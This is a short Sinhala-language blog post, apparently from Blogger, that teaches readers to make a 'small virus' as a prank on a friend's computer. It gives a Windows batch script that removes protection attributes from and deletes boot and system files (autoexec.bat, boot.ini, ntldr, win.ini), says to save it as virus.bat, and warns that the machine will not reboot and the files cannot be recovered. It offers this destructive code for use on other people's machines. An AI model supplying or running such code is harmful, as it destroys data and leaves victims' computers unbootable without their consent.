WA1

යාලුවාගෙ කම්පියුටර් එකට ගේම දෙන්න පොඩි වෛරස් එකක් හදමු





ඔන්න එහෙනම් මිත්‍රරුනි,
                                     අලුත් අවුරුද්දෙ පළවෙනි ලිපිය හැකින් වලින්ම පටන් ගත්තා.එහෙනම් අපි බලමු මොකක්ද මේ හැකින් වැඩේ කියලා.
මේක නම් ටිකක් බයානක වැඩක්.ටිකක් පරිස්සමෙන් තමා කරන්න ඕනි.එහෙනම් අපි බලමු මොකක්ද කරන්නෙ කියලා.
මුලින්ම පරිගණකයේ නෝට්පෑඩ් එක ඕපන් කරගන්න.ඊට පස්සේ මේ කෝඩ්ස් ටික ඒකට කොපි කරල පේස්ට් කරන්න.



@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

දැන් ඊට පස්සේ ඔයා කැමති නමක් දාලා .bat කියල සේව් කරන්න.
උදා :- virus.bat

හරි දැන් මේක හදාගෙන ඉවරයි.මේක ටෙස්ට් කරන්න කලින් මේකෙන් වෙන දේ ගැන කියන්න ඕනි.
මේකෙන් වෙන්නේ පරිගණකය shut down වෙලා reboot වෙන්න ඕනි කරන ෆයිල්ස් ටික නැති කරන එක.මේක ඔයාගේ පරිගණකයේ ඕපන් කරන්න එපා.මොකද මේක ඕපන් කරලා වැඩේ වුණාට පස්සේ අර නැතිවෙච්ච ෆයිල්ටික රිකවර් කරන්නත් බෑ.
මම ආයිත් කියනවා.මේ වැඩේ කරන කොට ටිකක් පරිස්සමින් කරන්න. 
 හරි එහෙනම් මම යනවා.ඔයාලා හැමෝටම සුබම සුබ දවසක් වේවා!!!!!!!!!
 

No comments:

Powered by Blogger.